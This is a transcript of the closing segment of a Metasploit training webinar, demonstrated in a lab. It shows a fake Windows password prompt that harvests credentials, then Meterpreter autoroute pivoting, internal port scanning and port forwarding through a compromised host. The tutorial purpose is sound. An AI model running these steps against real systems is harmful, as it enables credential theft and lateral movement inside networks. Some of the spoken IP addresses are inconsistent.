80. We're going to set the URI path just to slash. And now we're going to exploit -J. Again, that puts it in the background so that we have our prompt back. And if we do jobs -L, you can see that running. Now we're going to switch back to, let me copy and paste here. Oh, where'd it go? There it is. We're going to switch back to the PowerShell module. You can't put use in there twice. And it's still set up the way we set it. So now we can run this. And what it's going to do over here in our box is we prompted for credentials. That looks fairly legit. Most people, when they see this, they say, oh, something's not authenticating right in Windows. Let me put in my password. Okay, it went away. It worked that time. And when we come back and look over here, why did that not pop up? There it is. Okay, I was impatient. So our basic listener throws back the response that it got with the username and password. That works really, really well. You would not believe when Windows prompts somebody for a password, how many people just put it in because they don't think otherwise. They have no idea that they're already compromised. So anyways, there you go. We compromised the box with, let's say a Tomcat vulnerability or one of who knows how many other web-based vulnerabilities. We get on there, we're running a system, but we use something like this. Now we get a system administrator to give us their credentials, which hopefully is running as a domain admin. Maybe, maybe not, but if not, it usually at least gives us some other options. Last thing I wanted to do really quick is show you the auto route command. And I'm really short on time, but if you have to leave, that's fine. I'll go ahead and let the video run through once we finish this. So the auto route command can be used for pivoting through a compromised host. So we've popped a box, we've got a session, that's all set up. Now, actually, let me see if, okay. So if we do sessions-i1, if we do ifconfig on this, now you notice it's a Windows box, but I typed ifconfig, right? Meterpreter does the fancy little translation there and says, oh, you meant ipconfig. And because this is a demo virtual machine, there's a whole bunch of virtual interfaces here. But if we look, interface 11 is the IP that we've been playing with, right? That's the network that we're on. And if we scroll through the rest of these, that's an internal. Most of these don't have IP addresses. But this one does, 172.168.136. It's got another NIC. That's very common when you get into a server. You start looking at these and find out, oh, wow, there's another one I need to check out. So we want to find out what else is on this network. What else is on this 172.16 network? So what I'm going to do, I'm going to do run autoroute-h, and it'll give me several options here. I can delete routes, a couple of different manners of adding routes, either by subnet or netmask, and then also printing routes. So if I do that same thing, -p, it's going to tell me that there aren't any routes added yet. Well, I want to add a route, so I'm just going to do run autoroute-s 172.168.1.0/24, and I got the 0 based on the subnet that I was on here on that other NIC. So we add that, and boom, it says added route to this other network via 192.168.1.23. That's all it takes. Now, if we want to scan that other network, we can see what we can find. So we're going to background this, and we're going to use Metasploit's built-in TCP scanner. So we're going to use auxiliary scanner, port scan, TCP, show options. All right, here we're going to set our hosts. Notice it's hosts with an S, not single case. 172.16.1. And just for time's sake, I'm going to limit it to 130 to .140 because I know what's on the other network. But obviously you can do whatever you want there. We're going to set ports just to 80 for now. And then I'm going to go ahead and set threads to 20, just so it'll run a little bit faster. And as always, I always type show options after I do that to make sure everything's right. And now I'm going to run, and it's going to run through here, and immediately it finds 172.1.137 is listening on port 80. Now that's on a network that we have no direct access to, but we're pivoting through this this other compromised box. You know, you can obviously port scan an entire range. You can do lots of other stuff. You can go from there. But the other thing we want to do after that point is we want to actually attack port 80. Now, the thing with the auto route command is it only sets up the route from within Metasploit. So we can use modules within Metasploit to attack it, but we can't do other stuff. And there are lots of other tools that we might want to use. So what we want to use is the port forward command. So if we come out here, we're going to do, I'm going to go ahead and interact with that session again. And I'm going to set up, if we do port forward -H, it shows us, it's basically just like setting up an SSH port forward. You can establish the host IP that you want to listen on. I always just leave that to default. It's localhost. You can set up the port to listen on locally, and then the remote port and the remote IP. So what we're going to do is we're going to do port forward add -L for the dash lowercase l for the local port. I'm going to say I'm going to do it on 8080, and then -P is the remote port, and that's on 80, and then -R is the IP address that we just found, 172.168.1.137. And what this is going to do is now we have a local TCP relay listening on localhost 8080, and it redirects it over to that port. So if we come over here and we pop up our browser, we can go to 127.0.0.1, and we can connect to the Metasploitable machine listening on that other domain. That's just something I set up quickly so we would have an example. At that point, we complete access to whatever else is on the network, and we can do. The downside to the port forwards, just like with an SSH port forward, is having to go through here and set those up one at a time for the different things you want to connect to. But using some of the auxiliary scanners within Metasploit, you can simplify that and automate that process much more. And last thing before we finish, I just wanted to, background. If you notice, again, Metasploit has kept track of all the things that we found. So for instance, we found this other box. Metasploit goes ahead and adds it into the database. The different creds we found, the SNMP trap, it adds all that into the database. Services, it finds the different services we found, even the one on the other port, it adds it in. Now remember, we deleted all that earlier when we did the DBN map, is why that after we did that, so that's not there. So that brings us to the end for today. I know it's a lot of information crammed in just a couple of hours. Hopefully you've learned a little bit. And my goal is that this will give you a kind of a jump start into taking it further and figuring some of this stuff out on your own. I can't tell you enough how important it is just to play with it, try things out, learn how they work, and you'll grow from there. Let me just switch back here. Thank you, Jeremy. He said nice presentation. There we go. If you have any questions or issues, feel free to shoot me an email. If I don't know the answer, I'll find someone who does. I'm going to go ahead and stop the recording now, but I'll stick around for a bit in chat just in case you have any further questions or if there's anything else I can help.